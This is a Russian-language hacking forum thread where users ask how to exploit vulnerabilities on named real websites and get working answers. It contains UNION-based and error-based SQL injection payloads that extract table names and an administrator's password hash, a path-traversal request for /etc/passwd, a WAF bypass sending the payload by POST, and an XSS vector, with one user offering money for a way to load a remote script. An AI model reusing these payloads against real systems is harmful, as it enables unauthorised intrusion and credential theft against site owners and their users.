Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. foxxx1234

    foxxx1234 Member

    Joined:
    26 Nov 2008
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    Есть активка "><img src=f onerror=alert('x') /> возможно через нее загрузить скрипт? словo script и все составляющие не проходят. Нужно чтобы работало на подобии <script src='http://sait.ru/f.js'>
     
  2. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    http://www.ctege.info/index.php?option=1 как раскрутить?
     
  3. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    578
    Likes Received:
    203
    Reputations:
    13
    Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:
    http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd

     
  4. foxxx1234

    foxxx1234 Member

    Joined:
    26 Nov 2008
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    Зачем мне это гуглить, xss есть, мне просто нужно чтобы скрипт свой можно было подгрузить. В общем кто знает как это сделать стукните в личку даю 500р
     
  5. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    sqli там тоже есть
     
  6. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Как раскрутить это?
    Code:
    _ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    Code:
    select user_id, username, posts from phorum_users where posts > 0 order by posts DESC LIMIT 0,[COLOR=Red][INJECT][/COLOR]
    Инъекция в LIMIT при использовании конструкции ORDER BY.

    Вывод - никак не раскрутишь.
     
    _________________________
    3 people like this.
  8. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    71
    Reputations:
    124
    Как в таком запросе: http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20-- вместо version() вывести произвольную строку? Заранее благодарен.
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    шифруешь строку в хекс и вставляешь
     
    1 person likes this.
  10. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    578
    Likes Received:
    203
    Reputations:
    13
    SQLi там есть, но раскрутить ее у меня не получилось, ибо строка запроса тупо попадает в условие запроса. Кто-то более опытный, может быть, сможет что-то выжать.
     
    1 person likes this.
  11. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/
     
  12. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Первый пост темы
    Ключевое слово тут - детальной.
     
    #21672 Melfis, 26 Dec 2012
    Last edited: 26 Dec 2012
    1 person likes this.
  13. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить
    http://tonnel.ru/?l=recept&recept=obich&idi=193'

    И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается
     
    #21673 zenon3, 28 Dec 2012
    Last edited: 28 Dec 2012
  14. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    по первому вопросу:
    запрос фильтруется по union, когда передаёшь гетом(возможно ещё что-то, но пофиг). Скрипт принимает пост так же как и гет, только не фильтрует данные (или же хост сам фильтрует только гет на юнионы и пр.).
    Шлёшь на http://tonnel.ru/
    l=recept&recept=obich&idi=-193' union select 1,(select table_name from information_schema.tables limit 1),3,4,5,6,7,8,9--
    2. смотря как фильтруется, может и саму фильтрацию просто можно обойти.
     
    2 people like this.
  15. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю:
    Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    И вот че пишут: 63303161616237343161363064663039313866363861346434303137623331
    Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает.

    Как вывести весь пароль? :confused:
     
  16. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    915
    Likes Received:
    482
    Reputations:
    724
    Vip77, можно использовать функцию RIGHT().
     
    _________________________
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    1' and(select 1 from(select count(*),mid((select unhex(hex(cast(password as char))) from `slidem`.dle_users limit 0,1),rand(0)|0,64)x from information_schema.tables group by x)a) and '1'='1
     
    2 people like this.
  18. singa

    singa New Member

    Joined:
    14 Oct 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить.
    http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/*
    По-моему, параметр page в коде просто приводится к целому числу и вставляется
    ...desc limit {$page}-12, 12....
    Но я могу ошибаться.
     
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    _ttp://www.guljan.info/news/2012/October/2707?page=-2

    Вектор атаки невозможен по причине выделенной выше
     
    _________________________
  20. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Помогите раскрутить:
    Code:
    _ttp://w ww.knightarmco.com/shop/ index.php?keyword=5&main_page=advanced_search_result&search_in_description=1
    параметр keyword уязвим... чёт у меня ничего не получается...
     
Loading...
Thread Status:
Not open for further replies.